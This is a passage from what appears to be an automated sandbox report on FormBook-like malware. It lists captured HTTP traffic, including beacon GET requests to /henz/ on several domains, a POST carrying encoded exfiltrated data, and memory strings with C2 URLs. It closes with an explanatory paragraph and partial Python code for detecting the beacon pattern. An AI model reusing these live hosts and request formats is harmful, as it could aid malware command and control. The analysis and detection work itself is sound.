20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 
3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:33 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 
3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:26:01 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=c570c0e56952311d05e6ddd9a42f969d; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 869Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 db 6e e4 36 0c 7d cf 57 28 7e ed c8 9e 74 93 b4 48 c7 53 60 b3 4d 81 02 db 04 4d ba 40 9f 0a d9 a2 6d 6d 24 51 90 38 37 a0 1f 5f d9 1e cf 2d 93 ec 26 31 40 88 34 c9 c3 db 99 9c 7e ba bd 7e f8 e7 ee 37 d6 90 d1 d3 93 49 fb 30 2d 6c 9d 27 60 f9 2c 24 d3 13 16 bf 49 03 42 f6 6a 67 1a 20 c1 ca 46 f8 00 94 27 33 aa f8 cf c9 13 37 5a 02 1b dd 0b 25 a9 c9 25 cc 55 09 bc 33 46 4c 59 45 4a 68 1e 4a a1 21 3f 4b c7 09 b3 c2 40 9e cc 15 2c 1c 7a 8a 70 5b 3c 52 a4 61 3a c9 fa f7 a0 4e 9f e7 b1 40 0a c9 b6 aa 45 65 25 2c 47 cc 62 85 5a e3 e2 f9 06 87 da 12 42 e9 95 23 85 f6 db c1 8f b0 5a a0 97 61 af d1 53 ce d9 8d 88 83 a2 0d 8c f3 e8 3a 70 fe 8e 58 6b 60 37 11 ad 0f d8 78 b5 b2 8f ac f1 50 e5 49 43 e4 c2 55 96 55 6d 54 5a 77 29 c2 a9 90 96 68 b2 32 84 5f 2b 61 94 5e e5 b7 0e ec 0f f7 c2 86 ab 0f e3 f1 28 8a 1a 9d 47 e5 bc 55 2e a3 72 d9 2a 3f 45 25 8a fa ef af b8 e9 85 58 1d 89 bd 88 ca c5 f1 a4 3b 74 4e 1d 2d f0 7c 52 c2 3c e8 3c 09 b4 d2 10 1a 00 7a b2 a2 2f 60 25 7a 76 7d 7f cf 6e 54 0c 7a 76 13 d9 fc c7 7f e7 5d 70 26 30 b4 92 c6 f9 8f 15 f8 46 76 81 91 1d e4 85 6b f7 b7 b5 52 a3 ec 7b 11 79 77 ed 43 fb cd a8 cb 1e ae 6f b3 37 de d1 65 ad 55 dd 50 04 ea 00 37 d6 3b 10 3d 18 d5 b5 b5 d5 de 88 14 16 ca c1 f0 f0 62 66 a5 86 57 37 d6 8e 55 a1 25 2e 16 10 d0 bc 08 b0 4f c2 07 30 4e 0b 02 f6 59 28 bb e1 e2 8b 54 6c 8b 75 88 2f b5 38 c9 1a 10 72 5d ad ff 53 a0 5c ed a0 4a 35 67 a5 16 21 e4 89 13 52 2a 5b 73 23 13 d6 21 e5 89 11 be 56 96 13 ba ab 8b b1 5b fe 32 c0 ee 64 79 5c 24 c7 f1 4a d4 11 8b 9f b3 b5 82 55 15 80 d6 76 30 fc 72 50 d6 8e 0f 8c 60 49 bc 04 4b e0 77 30 0f 71 9b 8b 64 7a 8b 2e 8c d8 43 a3 02 bb 13 35 b0 6b 9c 69 c9 fe 44 62 1f 81 dd 60 bc df e9 24 8b 39 07 28 cd d9 00 62 da a1 b8 45 0b 0c bc 47 cf db 45 c5 e9 93 e9 f9 f8 3c ae ed 6c e7 44 9b e5 6d 70 c4 00 53 90 65 51 78 98 95 25 84 c0 0c 2f 90 08 4d 1c 2b 59 1f 2b 99 4e d4 10 5e 09 56 09 de 44 6e c4 bf 99 9a b2 8f a2 7c 64 84 ec 93 08 4d 81 c2 cb 49 26 a6 6f af 95 95 91 7e a2 24 3e 0b 4f cb 82 9d 83 46 37 94 be ee 43 d9 df 61 af 66 bf b6 8e 95 59 1a 0f b4 21 e1 9e 23 5e bd 73 ec fd dc 12 68 9f b9 ad f7 0b 58 89 9e fd d1 33 3b f4 c9 a1 f4 ca 11 0b be ec 39 3d ef 82 32 37 f3 50 c6 1b 46 1a ec ea e9 d7 76 a8 ac 4f 7a 3e 5b 60 68 e5 3b a3 0b 44 0a e4 85 cb be 86 ad 91 16 91 41 1a 52 a3 ec 77 e2 d4 5a d5 0d 15 b8 6c 71 36 c6 2b 00 54 c0 c8 48 e0 5a ac 70 46 83 99 ba c7 5a be 02 25 2c 94 83 e1 e1 af 9e c2 35 8e 83 11 4a f3 0a bd c9 e6 42 2b 29 08 0e b2 4f ba 8b 3e 80 71 3a 3a d9 67 a1 ec 70 d8 e3 77 8d 2b 89 a0 87 4d f4 a4 2a 50 ae 5a 1e 35 64 f4 f4
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:26:03 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=642acd1bd4e5af4738220f65563c7d37; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 61 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 73 20 2d 2d 3e 0a 0a 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 7c 52 61 6c 65 77 61 79 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 35 30 30 2c 35 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 7c 50 6f 70 70 69 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 35 30 30 2c 35 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 56 65 6e 64 6f 72 20 43 53 53 20 46 69 6c 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 61 6f 73 2f 61 6f 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 6
Source: help.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://206.119.101.137/ak_Address/Address.js
Source: help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
Source: help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://gmpg.org/xfn/11
Source: Lc8xQv8iZY.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Lc8xQv8iZY.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.348880659.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.323170503.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.368664553.0000000008260000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: -ODfqI49.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: help.exe, 00000005.00000002.569785642.0000000004302000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: help.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?d0766413c666e394f861185086d7f52f
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: help.exe, 00000005.00000002.569622242.0000000003B28000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.lyonfinancialusa.com/henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs
Source: unknown HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
Source: unknown DNS traffic detected: queries for: www.eufidelizo.com
Source: global traffic HTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
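The seven GET requests above share one URI path (/henz/), the same two query-parameter names (4hq and o8) and an identical o8 value, and are sprayed at seven different hosts with Connection: close and no User-Agent; the single POST reuses the path and the 4hq name in its form body against one of those hosts, this time with an IE11-style Trident User-Agent. That shape, one path and one per-build parameter set sent to a list of domains of which most are decoys, is how FormBook beacons, which is also why several of the hosts answer with generic nginx or Apache 404 pages. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses requests constructed from the lines of this report (hosts, path, parameter names and the o8 value copied; the 4hq values shortened; Content-Length dropped because the POST body is shortened) and surfaces the cluster. The function names, the Request type and the three-host threshold are this example's own choices.

```python
"""Added example (not from the report or the sample): cluster captured HTTP requests that
share a URI path and parameter names across many hosts, the beaconing shape FormBook uses.
Sample traffic below is constructed from the request lines of this report."""
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit


@dataclass
class Request:
    method: str
    host: str
    path: str
    params: dict   # parameter name -> value, from the query string (GET) or the form body (POST)
    headers: dict  # lower-cased header name -> value


def parse_request(raw: bytes) -> Request:
    """Parse one raw HTTP/1.x request (request line, headers, optional body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = dict(parse_qsl(parts.query))
    # The report shows a run of NUL bytes after each request; strip it before reading a form body.
    body_text = body.decode("latin-1").rstrip("\x00")
    if body_text:
        params.update(parse_qsl(body_text))
    return Request(method, headers.get("host", ""), parts.path, params, headers)


def find_beacon_clusters(requests, min_hosts=3):
    """Group requests by path; keep groups that reach >= min_hosts distinct hosts and share at
    least one parameter name. Parameters whose value never changes across the group are a fixed
    per-build token; those that change carry per-request (encrypted) beacon or exfil data."""
    by_path = defaultdict(list)
    for r in requests:
        by_path[r.path].append(r)
    clusters = []
    for path, group in by_path.items():
        hosts = sorted({r.host for r in group})
        shared = set.intersection(*(set(r.params) for r in group))
        if len(hosts) < min_hosts or not shared:
            continue
        values = defaultdict(list)
        for r in group:
            for name, value in r.params.items():
                values[name].append(value)
        constant = {n: v[0] for n, v in values.items() if len(v) > 1 and len(set(v)) == 1}
        varying = sorted(n for n, v in values.items() if len(set(v)) > 1)
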